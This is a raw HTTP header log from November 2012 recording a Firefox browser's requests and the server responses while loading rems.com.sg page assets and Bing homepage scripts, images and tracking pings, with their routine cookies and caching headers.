Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:28 GMT
Etag: &quot;4273352-c51-4c52ab7b26a5a&quot;
Accept-Ranges: bytes
Content-Length: 3153
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /fd/sa/8_10_0_1586855/AutoSug.js HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=D=2553914&amp;MS=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Encoding: gzip
Last-Modified: Mon, 04 Oct 2010 15:48:25 GMT
Content-Length: 8101
Vary: Accept-Encoding
Cache-Control: public, max-age=15406175
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
GET /images/rems_02.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:02 GMT
Etag: &quot;3f09e83-7a-4c52ab9bd2bad&quot;
Accept-Ranges: bytes
Content-Length: 122
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /az/hprichbg?p=rb%2fLichtensteinCastle_ROW8041699813_1366x768.jpg HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=D=2553914&amp;MS=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Mon, 08 Oct 2012 22:36:11 GMT
Content-Length: 222799
Cache-Control: public, max-age=499597
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
GET /fd/ls/l?IG=937ccaa1fdf84836ad798eda1af35d11&CID=0342B58B415E68A91BF9B1994059688F&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:7,%22FC%22:-1,%22BC%22:7,%22BS%22:11,%22H%22:60,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:68,%22KP%22:-1,%22CT%22:76,%22IL%22:0}}&P=SERP&DA=Db3 HTTP/1.1

Host: www.bing.com
GET /fd/ls/l?IG=937ccaa1fdf84836ad798eda1af35d11&amp;CID=0342B58B415E68A91BF9B1994059688F&amp;PM=Y&amp;Type=Event.CPT&amp;DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:7,%22FC%22:-1,%22BC%22:7,%22BS%22:11,%22H%22:60,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:68,%22KP%22:-1,%22CT%22:76,%22IL%22:0}}&amp;P=SERP&amp;DA=Db3 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=D=2553914&amp;MS=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache
Pragma: no-cache
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP=&quot;NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND&quot;
Content-Length: 42
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
Set-Cookie: _FS=NU=1; domain=.bing.com; path=/ SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/
GET /sa/8_01_0_1590430/homepageImgViewer_c.js HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 03 Nov 2010 12:04:08 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3907
Cache-Control: public, max-age=15501811
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
GET /az/hprichbg?p=rb%2fCanalStMartin_ROW12497968589_1366x768.jpg HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Tue, 23 Oct 2012 19:01:13 GMT
Content-Length: 157323
X-N: S
Cache-Control: public, max-age=585893
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
GET /qsonhs.aspx?FORM=ASAPIH&q= HTTP/1.1

Host: db3.api.bing.com
GET /qsonhs.aspx?FORM=ASAPIH&amp;q= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=D=2553914&amp;MS=2553914&amp;AF=NOFORM; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108
HTTP/1.1 200 OK

Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
Date: Thu, 08 Nov 2012 13:14:52 GMT
Content-Length: 35
GET /images/menu-bottom-pointer.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/menu-style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:45 GMT
Etag: &quot;56516b2-84-4c52ab8bc75de&quot;
Accept-Ranges: bytes
Content-Length: 132
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /HPImageArchive.aspx?format=js&idx=0&n=1&nc=1352380492714 HTTP/1.1

Host: www.bing.com
GET /HPImageArchive.aspx?format=js&amp;idx=0&amp;n=1&amp;nc=1352380492714 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#
HTTP/1.1 200 OK

Content-Type: application/json; charset=utf-8
Cache-Control: private
P3P: CP=&quot;NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND&quot;
Content-Length: 538
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
Set-Cookie: _FS=NU=1; domain=.bing.com; path=/ SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/
GET /images/sprite.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:12 GMT
Etag: &quot;29f031f-69a-4c52aba5a0ff9&quot;
Accept-Ranges: bytes
Content-Length: 1690
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
GET /images/slider-seperator.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:06 GMT
Etag: &quot;b6d6c0-2af-4c52ab9ff7e48&quot;
Accept-Ranges: bytes
Content-Length: 687
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/ind-banner-frrequot-bg.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:41 GMT
Etag: &quot;56516ab-105-4c52ab88707af&quot;
Accept-Ranges: bytes
Content-Length: 261
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/footer-bg1.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:36 GMT
Etag: &quot;56516a5-ed5-4c52ab82e98cb&quot;
Accept-Ranges: bytes
Content-Length: 3797
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/footer-h2seperator1.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:36 GMT
Etag: &quot;56516a7-e32-4c52ab8355b14&quot;
Accept-Ranges: bytes
Content-Length: 3634
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
GET /images/footer-bg.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:35 GMT
Etag: &quot;56516a4-93-4c52ab82aa121&quot;
Accept-Ranges: bytes
Content-Length: 147
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/cloud.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:31 GMT
Etag: &quot;4273355-172fb-4c52ab7e18424&quot;
Accept-Ranges: bytes
Content-Length: 94971
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/expert-ce-glow.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:35 GMT
Etag: &quot;2d2f725-1e67-4c52ab821f2d0&quot;
Accept-Ranges: bytes
Content-Length: 7783
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
GET /images/socil-bg-middle.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:11 GMT
Etag: &quot;b6d6c8-a3-4c52aba5005e1&quot;
Accept-Ranges: bytes
Content-Length: 163
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /images/social-bg-left.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:11 GMT
Etag: &quot;b6d6c6-354-4c52aba4a3d75&quot;
Accept-Ranges: bytes
Content-Length: 852
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /images/social-bg-right.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:11 GMT
Etag: &quot;b6d6c7-327-4c52aba4d2b7f&quot;
Accept-Ranges: bytes
Content-Length: 807
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
GET /fd/sa/1020103738/Shared.js HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Encoding: gzip
Last-Modified: Wed, 20 Oct 2010 10:37:38 GMT
Content-Length: 1431
Vary: Accept-Encoding
Cache-Control: public, max-age=10996667
Date: Thu, 08 Nov 2012 13:14:53 GMT
Connection: keep-alive
GET /fd/sa/0823125817/PostContent.js HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#; RMS=F=C
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Encoding: gzip
Last-Modified: Mon, 23 Aug 2010 12:58:17 GMT
Content-Length: 918
Vary: Accept-Encoding
Cache-Control: public, max-age=13679594
Date: Thu, 08 Nov 2012 13:14:53 GMT
Connection: keep-alive
GET /fd/sa/0916193114/FdNetIdentityHeader_c.css HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#; RMS=F=G
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Thu, 16 Sep 2010 19:31:14 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 354
Cache-Control: public, max-age=13605869
Date: Thu, 08 Nov 2012 13:14:53 GMT
Connection: keep-alive
X-N: S
GET /fd/sa/0918083739/FdNetIdentityHeader_hp.css HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#; RMS=F=GAAAAAAAAAB
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Sat, 18 Sep 2010 08:37:39 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 252
Cache-Control: public, max-age=7025516
Date: Thu, 08 Nov 2012 13:14:53 GMT
Connection: keep-alive
X-N: S
GET /images/rems_31.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:03 GMT
Etag: &quot;3f09e87-77-4c52ab9cbbd95&quot;
Accept-Ranges: bytes
Content-Length: 119
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /css/skins/images/bg_sub_left.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/menu-style.css
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:48 GMT
Etag: &quot;2974ce5-199-4c52abc778d8d&quot;
Accept-Ranges: bytes
Content-Length: 409
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
GET /css/skins/images/arrow.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/menu-style.css
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
